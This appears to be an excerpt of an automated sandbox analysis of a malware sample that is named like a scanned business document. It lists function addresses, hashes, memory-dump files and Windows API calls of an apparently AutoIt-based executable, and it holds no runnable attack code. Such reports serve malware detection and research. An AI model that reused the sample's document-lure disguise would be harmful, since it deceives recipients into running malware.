                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction ID: 6e8093254a81a06023c058f503c40e12aa0dbb5d7793aed6e620ca3b808fb9a3
                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction Fuzzy Hash: CE51336263C707AFDB388D688C597BF63899B03300F18051AD886D7282CE59DE35E75E
                                                      Function 002F2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0&5
                                                      • API String ID: 0-1313307525
                                                      • Opcode ID: b30f2793b1429208ea72cd52093b6fc65d6b4924972cc6a9feb027a082ac3ed7
                                                      • Instruction ID: bd175be9e281ae173c2338ea2ce1eb7a380c68e3662e8242bccd03131ce4cfce
                                                      • Opcode Fuzzy Hash: b30f2793b1429208ea72cd52093b6fc65d6b4924972cc6a9feb027a082ac3ed7
                                                      • Instruction Fuzzy Hash: DD21BB326206158BDB28CF79C81367EB3E9A765310F15862EE4A7C37D0DE75A904CB40
                                                      Function 002B6DD9 Relevance: .6, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32f2dd38d48a86b2c12021b6acd22bea148f5dbf86e97761cd60f7ae67b8b250
                                                      • Instruction ID: f4d7d20702a31df1b062580b6c171c766bdd9082e6b3623442440f36d3c38bbb
                                                      • Opcode Fuzzy Hash: 32f2dd38d48a86b2c12021b6acd22bea148f5dbf86e97761cd60f7ae67b8b250
                                                      • Instruction Fuzzy Hash: EF320032D39F014DD7239634CC22336A25DAFB73C5F55D72BE82AB59A6EB29C4835100
                                                      Function 0029CC39 Relevance: .6, Instructions: 635COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc0c58b5f43e94c77e252588cd52df25ab76e8f380099575eb5a391bf678e602
                                                      • Instruction ID: aa115ea928b6b46b2f86d2b78639a9efae8483cec9795b5eff2e1bada8e4b3f2
                                                      • Opcode Fuzzy Hash: cc0c58b5f43e94c77e252588cd52df25ab76e8f380099575eb5a391bf678e602
                                                      • Instruction Fuzzy Hash: DC321431A741078BDF29CF68C4906BDBBA5EB45314F38856BD88ADB3A1D630DDA1DB40
                                                      Function 00287920 Relevance: .6, Instructions: 563COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d83d14093c818e1974f5163103c9a87282f515da40d007af8cd817b65347abfb
                                                      • Instruction ID: 097bbc1a2add88ec9c993bd3a524fc7f0c8fb948218e7c08fa95f123b9c9f2d2
                                                      • Opcode Fuzzy Hash: d83d14093c818e1974f5163103c9a87282f515da40d007af8cd817b65347abfb
                                                      • Instruction Fuzzy Hash: 0222B174A2461ADFDF14DF64C981BAEB3F6FF44300F244629E816A7291EB35E960CB50
                                                      Function 002891C0 Relevance: .5, Instructions: 475COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da8d1a99183d07ae354d4d7fd81cc215515313f61865748520c3f920ab86a4fe
                                                      • Instruction ID: c71ec181af76e004bf89cf15d5b3454a0451c0fc6ac7f6abdafabb59ddcba4fd
                                                      • Opcode Fuzzy Hash: da8d1a99183d07ae354d4d7fd81cc215515313f61865748520c3f920ab86a4fe
                                                      • Instruction Fuzzy Hash: 5B02B3B5A20206EBDF04DF54D981BADB7B5FF44300F158169E816DB290EB71AA70CF91
                                                      Function 002A1C77 Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: a021f476301b7cd1d32aba837a4fcc4891bfaea9bc15647b237ac335b587bd91
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: 469157725280A34BDB2D4A3E857407EFFE15A933B1B1A079ED4F2CA1C5FE149974D620
                                                      Function 002A19B0 Relevance: .2, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: afc3d3b883cee40d6e979ce3d2468ade218483154909fd43f5f89b2daf6217e5
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: 7F9143722290A34BDB2D4A7A857403EFFE15A933B6B1A079ED4F2CA1C1FD248574D620
                                                      Function 002A7A4A Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f06dbe0c9851883198b238d7ccd22c336c3e306f498346dc4cec33b5fda07a72
                                                      • Instruction ID: 57eded7cf16bb526e3b369c33af9a7528c2c66c17c8a6356af574b9ac6e0a8d3
                                                      • Opcode Fuzzy Hash: f06dbe0c9851883198b238d7ccd22c336c3e306f498346dc4cec33b5fda07a72
                                                      • Instruction Fuzzy Hash: 91617BB123870767DA349D288C95BBF6398DF43708F140D1AE942CB282DE519E72876D
                                                      Function 002A7CA7 Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bc8ddeea8789198a16537079d2dcb1fd5e6bce3ba478a6ce724e54dbf27e0ef
                                                      • Instruction ID: 199d86e0316dde0cdea0f0ccb575c501a00aee9b0697b362bc83a0bfd8d26fac
                                                      • Opcode Fuzzy Hash: 4bc8ddeea8789198a16537079d2dcb1fd5e6bce3ba478a6ce724e54dbf27e0ef
                                                      • Instruction Fuzzy Hash: D0617971638F0B57DE384E284D55BBF63989F43704F10095AE943CB281EF529D72865D
                                                      Function 002A1706 Relevance: .2, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: 58e44764a76a31c05ea278e15ce80e4add674b5bee60b39ec904ded235815a26
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: 048166725290A34FEB6D4A39853443EFFE15A933B1B1A079DD4F2CA1C1EE14C974D620
                                                      Function 0029D064 Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 119dfa5f753f3ce04ce66cc382bf3a2a4fef9a285aea5f6ec21575a0a0dd06e6
                                                      • Instruction ID: 54c4bfee5c8acd4d3cdc245403c8b00a01ac65bc8023b8d5d6d28e25b8985c61
                                                      • Opcode Fuzzy Hash: 119dfa5f753f3ce04ce66cc382bf3a2a4fef9a285aea5f6ec21575a0a0dd06e6
                                                      • Instruction Fuzzy Hash: A9413BEA84EED15FD3439B3868AD2447FB0ED6652930986CFD0C09628BE3994009CB4A
                                                      Function 03203610 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 92d74a4ccdc3e8433ba820ae587b81debb92f4fa25a4ef316e31a271554df131
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: F641A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                                                      Function 032034A0 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction ID: 12ac8341b21a0625ba93ee721f22865f89168ab972fd0f1cb91bad0284ce3bd7
                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction Fuzzy Hash: 14019278A14209EFCB48DF98C5909AEF7F5FB48310F248599D919AB741D730EE81DB90
                                                      Function 03203500 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction ID: 40557b214f982be9f31a063636f357f9173c9c460488b3a2bc70dc2cc1420981
                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction Fuzzy Hash: D5019278A14209EFCB48DF98C5909AEFBB5FB48310F248599D919A7741E730AE81DB80
                                                      Function 03201E70 Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                      Function 00302ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00302B30
                                                      • DeleteObject.GDI32(00000000), ref: 00302B43
                                                      • DestroyWindow.USER32 ref: 00302B52
                                                      • GetDesktopWindow.USER32 ref: 00302B6D
                                                      • GetWindowRect.USER32(00000000), ref: 00302B74
                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00302CA3
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00302CB1
                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302CF8
                                                      • GetClientRect.USER32(00000000,?), ref: 00302D04
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00302D40
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D62
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D75
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D80
                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D89
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302D98
                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302DA1
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302DA8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00302DB3
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302DC5
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0031FC38,00000000), ref: 00302DDB
                                                      • GlobalFree.KERNEL32(00000000), ref: 00302DEB
                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00302E11
                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00302E30
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00302E52
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030303F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 472a5e673290e49051e8babc6f9d96ba626305f928bf4a1cddb800d787ddaf6a
                                                      • Instruction ID: d26abad157d023c7cc623402e6eff5c8a0877c95f45a1411d30bf6241212ea62
                                                      • Opcode Fuzzy Hash: 472a5e673290e49051e8babc6f9d96ba626305f928bf4a1cddb800d787ddaf6a
                                                      • Instruction Fuzzy Hash: 3902AA75A11205AFDB16DFA4CC99EAE7BB9FB49710F048118F815AB2A1CB74ED00CF60
                                                      Function 003170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 0031712F
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00317160
                                                      • GetSysColor.USER32(0000000F), ref: 0031716C
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00317186
                                                      • SelectObject.GDI32(?,?), ref: 00317195
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003171C0
                                                      • GetSysColor.USER32(00000010), ref: 003171C8
                                                      • CreateSolidBrush.GDI32(00000000), ref: 003171CF
                                                      • FrameRect.USER32(?,?,00000000), ref: 003171DE
                                                      • DeleteObject.GDI32(00000000), ref: 003171E5
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00317230
                                                      • FillRect.USER32(?,?,?), ref: 00317262
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00317284
                                                        • Part of subcall function 003173E8: GetSysColor.USER32(00000012), ref: 00317421
                                                        • Part of subcall function 003173E8: SetTextColor.GDI32(?,?), ref: 00317425
                                                        • Part of subcall function 003173E8: GetSysColorBrush.USER32(0000000F), ref: 0031743B
                                                        • Part of subcall function 003173E8: GetSysColor.USER32(0000000F), ref: 00317446
                                                        • Part of subcall function 003173E8: GetSysColor.USER32(00000011), ref: 00317463
                                                        • Part of subcall function 003173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00317471
                                                        • Part of subcall function 003173E8: SelectObject.GDI32(?,00000000), ref: 00317482
                                                        • Part of subcall function 003173E8: SetBkColor.GDI32(?,00000000), ref: 0031748B
                                                        • Part of subcall function 003173E8: SelectObject.GDI32(?,?), ref: 00317498
                                                        • Part of subcall function 003173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003174B7
                                                        • Part of subcall function 003173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003174CE
                                                        • Part of subcall function 003173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003174DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 0836046ad93c3d1c1f0d40f108ce903e47eb9236f094a47b5bd5e979e0b0bdd4
                                                      • Instruction ID: e0117aa62ff850843d243024959645a17eab45af326beda9e10dada3fc983cff
                                                      • Opcode Fuzzy Hash: 0836046ad93c3d1c1f0d40f108ce903e47eb9236f094a47b5bd5e979e0b0bdd4
                                                      • Instruction Fuzzy Hash: 08A1BF72058301FFDB069F60DC48A9B7BBAFB4D320F145A29F962961E0D770E985CB51
